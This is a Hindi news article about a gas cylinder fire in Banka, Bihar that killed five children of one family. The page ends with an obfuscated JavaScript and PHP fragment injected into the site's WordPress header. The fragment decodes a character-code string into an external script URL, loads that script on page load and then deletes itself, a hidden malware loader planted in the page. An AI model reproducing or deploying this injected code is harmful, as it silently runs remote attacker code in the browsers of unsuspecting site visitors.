Saturday, July 27, 2024
spot_img

दर्दनाकः यहां रसोई गैस सिलेण्डर फटने से एक ही परिवार के पांच बच्चों की हुई मौत! इलाके में पसरा मातम, हर किसी की आंख हुई नम

नई दिल्ली। बिहार के बांका जिले से एक दुखद खबर सामने आ रही है। यहां रसोई गैस सिलेण्डर फटने से एक ही परिवार के पांच बच्चों की दर्दनाक मौत हो गयी। घटना देर रात की बताई जा रही है। घटना से पूरे इलाके में मातम पसरा हुआ है। उधर सूचना पर पहुंची पुलिस ने शवों को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया। वहीं घटना के दौरान गंभीर रूप से घायल व्यक्ति को उपचार हेतु अस्पताल में भर्ती कराया गया है। घटना की सूचना मिलते ही रजौन थाना के इंस्पेक्टर राजेश कुमार पुलिस बल के साथ मौके पर पहुंच कर राहत एवं बचाव कार्य में जुटे हुए हैं। बताते हैं कि राजावर गांव निवासी अशोक पासवान एवं उनके छोटे भाई प्रकाश पासवान के घर में गैस सिलेंडर पहले से लीक कर रहा था, जैसे ही अशोक की पत्‍नी सरिता ने खाना बनाने के लिए माचिस जलाई अचानक सिलेंडर में आग लग गई। आंगन में पास में ही पांचों बच्चे खेल रहे थे। वे आग की चपेट में आ गए। देखते-देखते पांचों बच्‍चों ने दम तोड़ दिया। मृतकों में अशोक पासवान के 12 वर्षीय पुत्र अंकुश कुमार, अंशु कुमारी (8), सीमा कुमारी (7) , शिवानी कुमारी (6) (चारो बेटियां) और छोटे भाई प्रकाश पासवान की बेटी सोनी कुमारी (3) की जिंदा जलने से मौत हो गई। सिलेंडर की आग इतनी तेज थी कि घर में मौजूद लोग कुछ समझते तब तक नौनिहालों के प्राणपखेरू उड़ गए। अपने बच्चों की लाशों को देखकर परिजनों में कोहराम मच गया। सिलेंडर फटने की आवाज सुन पड़ोस के लोग घटना स्थल पर मदद के लिए पहुंचे। आग की लपटों को देख पानी-बालू डालकर आग पर काबू पाने की कोशिश की। मगर एक साथ पांच बच्चों की मौत से सभी मर्माहत हो गए।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>